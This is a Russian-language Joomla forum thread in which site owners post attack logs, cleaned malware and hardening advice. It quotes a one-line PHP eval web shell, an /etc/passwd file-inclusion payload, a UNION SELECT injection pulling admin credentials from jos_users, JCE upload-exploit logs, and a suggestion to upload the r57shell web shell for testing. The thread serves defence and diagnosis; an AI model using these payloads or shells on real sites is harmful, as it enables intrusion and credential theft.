0 Пользователей и 1 Гость просматривают эту тему.
  • 678 Ответов
  • 243459 Просмотров
*

Langoliers

  • Давно я тут
  • 621
  • 67 / 2
  • Если б Я изучал людей, то был бы паразитологом
Мне кажется каптчу обойдут в два счета. Не лучше ли в настройках сервера ограничить кол-во одновременных подключений?

Раз уж песочницу поднимать умеете, то не думаю, что выставить ограничения для вас будет проблемой ;)
« Последнее редактирование: 15.03.2012, 10:23:40 от Langoliers »
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Сегодня нашел в error.log ,одного из трёх сайтов на хостинге.Сайты на CMS Joomla
Спойлер
[свернуть]
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Чищу сайт на Joomla ,везде понакидано js ,во всех яваскриптах
Спойлер
[свернуть]
*

yura-gamer

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
  • Joostina! - это RePack Joomla!
Доброго времени суток.
Я пользуюсь EasySEF (joostina тобишь), запалил такой лог от "китайских" друзей
У меня ответ на все ошибки сделаны через 404 и Honey Pot помогает

Спойлер
[свернуть]
« Последнее редактирование: 24.03.2012, 00:10:59 от yura-gamer »
*

NeoKS

  • Новичок
  • 5
  • 1 / 0
  • I LIKE JOOMLA
Хочу поделиться с Вами как я защищал свои сайты:
Спойлер
[свернуть]
« Последнее редактирование: 22.03.2012, 09:47:21 от NeoKS »
*

Langoliers

  • Давно я тут
  • 621
  • 67 / 2
  • Если б Я изучал людей, то был бы паразитологом
Цитировать
Даёт возможность работать с базой данных (изменять суффиксы таблиц), настраивать безопасность при помощи .htaccess, блокировать посетителей по IP или странам, анти-спам по словам, менять ID администратора, настраивать права доступа на файлы и папки на сервере, работать с SEO функциями, менять кодировку базы данных, чистить темп директорий и многое другое.
А я все это ручками делаю... Посему не вижу смысла в этом компоненте. Лишняя нагрузка будет только...

Короче все, что вы описали я делаю повседневно. За исключением антивиря - у меня Дебик. И бэкапы я делаю через ISP
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Вчера высмотрел скрипт в статье,адресе картинки
Код
/images/data: import.png.....
ПРивожу начало кода по памяти,так как ,не то что скопировать,а еле удалил.Браузер подвисал.
*

wfedin

  • Завсегдатай
  • 1273
  • 102 / 0
Сегодня вычистил из js файлов Др. Веб назвал этот код вирусом JS.Siggen.192
Спойлер
[свернуть]
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Десять минут ублюдки долбили отсюда   http://s048.panelboxmanager.com   IP 72.55.186.68
В итоге отсос
Правда хостер заглушку впер за email рассылку (сообщения шли мне о попытках взлома ) а так может и дольше долбили бы
Лог выкладывать нет смысла (просто это портянка на 5000 строк)
*

nexter

  • Осваиваюсь на форуме
  • 17
  • 1 / 0
Выкладываю свой лог. Предыстория такова. Постучался в аську и предложил проверить на наличие уязвимости позволяющей получить доступ к сайту. И если имеется в качестве подтверждения залить картинку. Потом в обмен на вознаграждение указать что именно и как исправить. Согласился. Минут через 5 он скидывает адрес картинки, в созданной папке images/stories/
Смотрю логи:

Line 276987: www.site.ru 95.129.166.242 - - [27/Mar/2012:17:40:48 +0400] "GET /favicon.ico HTTP/1.0" 200 2731 "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0 WebMoney Advisor"
   Line 276988: www.site.ru 95.129.166.242 - - [27/Mar/2012:17:40:52 +0400] "GET / HTTP/1.0" 200 10610 "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0 WebMoney Advisor"
   Line 276989: www.site.ru 95.129.166.242 - - [27/Mar/2012:17:40:54 +0400] "GET /templates/a421/favicon.ico HTTP/1.0" 200 2731 "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0 WebMoney Advisor"
   Line 276990: site.ru 95.129.166.242 - - [27/Mar/2012:17:41:01 +0400] "GET /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager HTTP/1.0" 301 - "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0 WebMoney Advisor"
   Line 276991: www.site.ru 95.129.166.242 - - [27/Mar/2012:17:41:02 +0400] "GET /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager HTTP/1.0" 200 24557 "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0 WebMoney Advisor"
   Line 276992: www.site.ru 95.129.166.242 - - [27/Mar/2012:17:41:21 +0400] "GET /stranica_sayta HTTP/1.0" 200 8689 "http://www.site.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0 WebMoney Advisor"
   
   первый вход и проверка как видим была за несколько дней до этого. вполне возможно что бот сканировал
   а вот уже сегодня вход
   Line 278424: www.site.ru 95.129.166.242 - - [30/Mar/2012:14:05:27 +0400] "GET /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager HTTP/1.0" 200 24557 "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0 WebMoney Advisor"
   Line 278425: www.site.ru 95.129.166.242 - - [30/Mar/2012:14:05:28 +0400] "GET /favicon.ico HTTP/1.0" 200 2731 "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0 WebMoney Advisor"
   Line 278426: www.site.ru 95.129.166.242 - - [30/Mar/2012:14:05:30 +0400] "GET / HTTP/1.0" 200 10737 "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0 WebMoney Advisor"
   Line 278427: www.site.ru 95.129.166.242 - - [30/Mar/2012:14:05:31 +0400] "GET /templates/a421/favicon.ico HTTP/1.0" 200 2731 "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0 WebMoney Advisor"
   Line 278445: site.ru 95.129.166.242 - - [30/Mar/2012:14:29:36 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=154&format=raw HTTP/1.0" 200 36 "site.ru" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101"
   Line 278446: site.ru 95.129.166.242 - - [30/Mar/2012:14:29:44 +0400] "GET / HTTP/1.0" 301 - "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0 WebMoney Advisor"
   Line 278447: www.site.ru 95.129.166.242 - - [30/Mar/2012:14:29:45 +0400] "GET / HTTP/1.0" 200 10737 "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0 WebMoney Advisor"
   Line 278461: www.site.ru 95.129.166.242 - - [30/Mar/2012:14:30:37 +0400] "GET /images/stories/test HTTP/1.0" 301 253 "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0 WebMoney Advisor"
   Line 278462: www.site.ru 95.129.166.242 - - [30/Mar/2012:14:30:37 +0400] "GET /images/stories/test/ HTTP/1.0" 200 44 "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0 WebMoney Advisor"
   Line 278464: site.ru 95.129.166.242 - - [30/Mar/2012:14:32:02 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&b8b1de7a7fcf69abf9ae57ef1d0817f4=e8503fedf0422c29e7a246ccb932897d HTTP/1.0" 200 69 "site.ru" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101"
   Line 278465: www.site.ru 95.129.166.242 - - [30/Mar/2012:14:32:08 +0400] "GET /images/stories/test/30.03.2012.jpg HTTP/1.0" 404 232 "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0 WebMoney Advisor"

видно что идет через com_jce удаляю этот компонент и плагины его. написал, что сам нашел и удалил. Тем не менее решил, небольшую сумму перевести ему, дабы не таил обиду и не сделал еще какой пакости :) На что он проверив см следующие 3 строчки лога, согласился. С тем и разошлись.
   

Line 278536: site.ru 95.129.166.242 - - [30/Mar/2012:15:01:32 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&b8b1de7a7fcf69abf9ae57ef1d0817f4=e8503fedf0422c29e7a246ccb932897d HTTP/1.0" 404 1844 "site.ru" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101"
   
   Line 278548: site.ru 95.129.166.242 - - [30/Mar/2012:15:15:49 +0400] "GET /?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager HTTP/1.0" 301 - "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0 WebMoney Advisor"


   Line 278549: www.site.ru 95.129.166.242 - - [30/Mar/2012:15:15:50 +0400] "GET /?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager HTTP/1.0" 404 1844 "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0 WebMoney Advisor"
Line 278537: site.ru 95.129.166.242 - - [30/Mar/2012:15:04:51 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=154&format=raw HTTP/1.0" 404 1844 "site.ru" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101"
   Line 278547: www.site.ru 95.129.166.242 - - [30/Mar/2012:15:15:46 +0400] "GET / HTTP/1.0" 200 10176 "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0 WebMoney Advisor"

О каких то уязвимостях этого компонента ничего не нашел.
*

nexter

  • Осваиваюсь на форуме
  • 17
  • 1 / 0
а уточните JCE с какого варьеза качали?
Оооо... давно это было. совершенно без понятия откуда качал :)
Вы думаете там изначально в него что-то вставлено было?
*

NathanD

  • Захожу иногда
  • 89
  • 5 / 0

... видно что идет через com_jce

О каких то уязвимостях этого компонента ничего не нашел.
вообще то не через JCE а через варезный плаг jce_imgmanager в котором видимо и находится бэкдор, впрочем ничего удивительного т.к. в нашей стране даже Firefox некоторые с варезников качают а потом сильно удивляются ;D
« Последнее редактирование: 30.03.2012, 20:48:40 от NathanD »
*

nexter

  • Осваиваюсь на форуме
  • 17
  • 1 / 0
*

wishlight

  • Живу я здесь
  • 4975
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Спойлер
[свернуть]

<?eval(stripslashes(array_pop($_POST)));?>

расшифровка eval

кто что думает?
*

Cyberprogs

  • Осваиваюсь на форуме
  • 12
  • 1 / 0
Привожу февральский лог из jHackGuard может кто подскажет, что это было?
Спойлер
[свернуть]
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
А кто замечал в логах ошибку копирования картинки ?
 http://show-  mania.com/sites/default/files/imagecache/galleryformatter_slider/photos/img_9678.jpg
сайт  http://show-  mania.com выдаёт phpinfo()
п.с.
урл с пробелами
а Google выдал http://ai.stanford.edu/~bangpeng/download/opening_the_door/opening_the_door.txt
*

chest

  • Осваиваюсь на форуме
  • 49
  • 3 / 0
Apache-mod_itk + php5 + suhosin + вменяемая настройка конфига php + адекватная расстановка прав доступа = 99% успеха, если конечно движок сайта не убогий до невозможности.
Ну а вообще большинство взломов сайтов идет сейчас через кражу/брут паролей ftp/ssh или акков админов/модеров и аналогичное. Толи хакеры обмельчали, толи современное ПО/движки стали защищеннее и стабильнее.  ;)
===
И еще момент который хотелось бы особо отметить... защищать нужно сервер на уровне ОС и ПО, а не средствами сайта пытаться отслеживать попытки скомпрометировать сервер.
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
...И еще момент который хотелось бы особо отметить... защищать нужно сервер на уровне ОС и ПО, а не средствами сайта пытаться отслеживать попытки скомпрометировать сервер...
Остроумно ))
Логи собираются для вычисления уязвимости и не для защиты, "умник"
*

chest

  • Осваиваюсь на форуме
  • 49
  • 3 / 0
Остроумно ))
Логи собираются для вычисления уязвимости и не для защиты, "умник"
И какой тогда от этого профит если:
 - это шаред хостинг и естественно с настройками сервера ничего нельзя сделать?
 - если работает защита на уровне ОС и ПО сервера, но вы об этом не знаете и думаете что вас "ломают", пытаясь посмотреть /etc/passwd, или что наоборот вы счастливчик и ваш сайт никому не интересен?
===
Если хотите оценить защищенность любого сервера хоть своего хоть хостинга залейте на него r57shell.php и попробуйте порыскать по системным файлам, по аккам соседей, достать логины и пароли. Если это получается, то защиты нет или она кривая и соответственно делайте выводы. Если это не получается, то с сервером все ок и не нужно страдать херней собирая логи попыток его взлома.
===
А как на счет уже годами отработанных схем защиты сервера, распределения прав доступа, контроля запуска процессов, логирования работы сервисов (как не странно наверное но правильные ОС этим занимаются самостоятельно). Или этих логов не достаточно чтобы вычислить уязвимость? Или этих знаний не достаточно чтобы грамотно прикрыть дыры на сервере и нужен очередной велосипед?
*

mohax

  • Давно я тут
  • 901
  • 66 / 3
а уязвимости не только на сервере бывают, но и в скриптах сайта. тут как раз больше такие логи интересуют. ошибки есть всегда, тем более 98% народу юзают варезные скрипты. так что Ваша критика тут абсолютно неправильна
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
И какой тогда от этого профит если:
......r57shell.php и попробуйте порыскать по системным файлам, по аккам соседей,.....
Заливал не однократно и сейчас залит  
И довел до такого уровня что он не открывается )))))
Ни сканер от flyingspook
Ни replace от icom
Просто выдают ошибки
Я даже картиyки через админ панель не могу залить пока ни проделаю манипуляции с .htaccess и php.ini
*

chest

  • Осваиваюсь на форуме
  • 49
  • 3 / 0
Я абсолютно не критикую сам проект сбора логов, т.к. если с его помощью код движка станет более защищен, то от этого выиграют все. Но мне не совсем ясна цель сбора логов для того чтобы их собрать. Если на их основе юзер и с кодом ничего не сможет сделать и на сервере настройки не поправит.
*

chest

  • Осваиваюсь на форуме
  • 49
  • 3 / 0
Заливал не однократно и сейчас залит 
И довел до такого уровня что он не открывается )))))
Ни сканер от flyingspook
Ни replace от icom
Просто выдают ошибки
Я даже картиyки через админ панель не могу залить пока ни проделаю манипуляции с .htaccess и php.ini
+100
Если удается комплексно довести настройки сервера до такого состояния, то максимум что сломают это кривой сайт на единственном акке. Дальше среднестатистическому хакеру уже не пробраться.
*

chest

  • Осваиваюсь на форуме
  • 49
  • 3 / 0
Я даже картиyки через админ панель не могу залить пока ни проделаю манипуляции с .htaccess и php.ini
Ну тут, наверное, уже паранойей попахивает, хотя соглашусь что иногда приходится делать и так. Приходилось спасать от хакеров крупный форум на очень древнем и заведомо дырявом движке. Извращался конечно изрядно, т.к. владелец наотрез отказывался заказывать доработку движка.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Цитировать
защищать нужно сервер на уровне ОС и ПО
согласен!
но то количество мелких хостингов которые растут как грибы после дождя
и то не желание оплачивать достойных специалистов крупными хостингами, они считают что лучше трех студентов взять на работу
вот и вывод кто будет там настраивать ОС и ПО
*

chest

  • Осваиваюсь на форуме
  • 49
  • 3 / 0
согласен!
но то количество мелких хостингов которые растут как грибы после дождя
и то не желание оплачивать достойных специалистов крупными хостингами, они считают что лучше трех студентов взять на работу
вот и вывод кто будет там настраивать ОС и ПО
Поддерживаю, но к сожалению владельца скрипта в именно этом случае полученные логи не спасут. Ему тупо никто не даст вмешиваться в "политику безопасности" хостера.
А если нужно проверить именно хостера на вшивость, то, имхо, проще всего это сделать через готовый php shell.
*

AdmbVlad

  • Захожу иногда
  • 83
  • 0 / 0
шо это такое? уже 3-й раз сайт чищу от вирусов
Код
** Local File Inclusion [GET:view] => ../../../../../../../../../../../../../etc/passwd\0
** Local File Inclusion [REQUEST:view] => ../../../../../../../../../../../../../etc/passwd\0

**PAGE / SERVER INFO


*REMOTE_ADDR :
77.37.146.247

*HTTP_USER_AGENT :
Opera/9.80 (Windows NT 6.1; WOW64; U; ru) Presto/2.10.229 Version/11.62

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_jesubmit
 -[view] => ../../../../../../../../../../../../../etc/passwd\0


*$_POST DUMP


*$_COOKIE DUMP
 -[6e05666faead221f0b6699bab41b16b7] => 46ec3dff150bec3c7c942d76ca3efedf
 -[111d6b48d8724afeb2d6913bb3c0e066] => 2edf4c5d851c6b42ccc7750e0fc8b930
 -[_ym_visorc] => w


*$_REQUEST DUMP
 -[option] => com_jesubmit
 -[view] => ../../../../../../../../../../../../../etc/passwd\0
 -[6e05666faead221f0b6699bab41b16b7] => 46ec3dff150bec3c7c942d76ca3efedf
 -[111d6b48d8724afeb2d6913bb3c0e066] => 2edf4c5d851c6b42ccc7750e0fc8b930
 -[_ym_visorc] => w

и еще вот

Код
** Union Select [GET:article] => 550513 and 1=2 union select concat(usernam  e,char(58),password)KHG from jos_users--
** Table name in url [GET:article] => 550513 and 1=2 union select concat(usernam  e,char(58),password)KHG from jos_users--
** Union Select [REQUEST:article] => 550513 and 1=2 union select concat(usernam  e,char(58),password)KHG from jos_users--
** Table name in url [REQUEST:article] => 550513 and 1=2 union select concat(usernam  e,char(58),password)KHG from jos_users--

**PAGE / SERVER INFO


*REMOTE_ADDR :
77.37.146.247

*HTTP_USER_AGENT :
Opera/9.80 (Windows NT 6.1; WOW64; U; ru) Presto/2.10.229 Version/11.62

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(usernam%20%20e,char(58),password)KHG+from+jos_users--&Itemid=1



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_mailto
 -[tmpl] => mailto
 -[article] => 550513 and 1=2 union select concat(usernam  e,char(58),password)KHG from jos_users--
 -[Itemid] => 1


*$_POST DUMP


*$_COOKIE DUMP
 -[111d6b48d8724afeb2d6913bb3c0e066] => 2edf4c5d851c6b42ccc7750e0fc8b930
 -[cbrvs] => cbrv1_009aa53887d425f053b9945f8543abca_hIq1khErS1fjc8yN
 -[6e05666faead221f0b6699bab41b16b7] => 1ee028aca7d2d4c31790a6a5f806f958
 -[d4815e8e87b1e37d097b0a71533207c1] => 58 C 2 8184A5F C5C474716524A B565C5C135A115B55 3135D55 C15 A465C 1 C1242 24A1643 9175647 C4B5F 1 B1B4016 713124013 E4D
 -[form_data] => panel_holder:1&visits:3
 -[_ym_visorc] => w


*$_REQUEST DUMP
 -[option] => com_mailto
 -[tmpl] => mailto
 -[article] => 550513 and 1=2 union select concat(usernam  e,char(58),password)KHG from jos_users--
 -[Itemid] => 1
 -[111d6b48d8724afeb2d6913bb3c0e066] => 2edf4c5d851c6b42ccc7750e0fc8b930
 -[cbrvs] => cbrv1_009aa53887d425f053b9945f8543abca_hIq1khErS1fjc8yN
 -[6e05666faead221f0b6699bab41b16b7] => 1ee028aca7d2d4c31790a6a5f806f958
 -[d4815e8e87b1e37d097b0a71533207c1] => 58 C 2 8184A5F C5C474716524A B565C5C135A115B55 3135D55 C15 A465C 1 C1242 24A1643 9175647 C4B5F 1 B1B4016 713124013 E4D
 -[form_data] => panel_holder:1&visits:3
 -[_ym_visorc] => w
*

chest

  • Осваиваюсь на форуме
  • 49
  • 3 / 0
*

AdmbVlad

  • Захожу иногда
  • 83
  • 0 / 0
А с чего вы решили что это вирусы?
третий раз вычищаю сайт от вирусов, а они все появляются. по этим логам видно вроде как доступ получить пытаются. может кто-то разъяснить по подробнее данные логи?
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 1076
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 1226
Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

Ответов: 0
Просмотров: 473
Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 1069
Последний ответ 03.11.2020, 17:36:03
от Cedars
Мониторинг файлов CMS и сайта - предлагаю решение

Автор GRIG

Ответов: 18
Просмотров: 4380
Последний ответ 28.08.2020, 22:00:30
от cntrl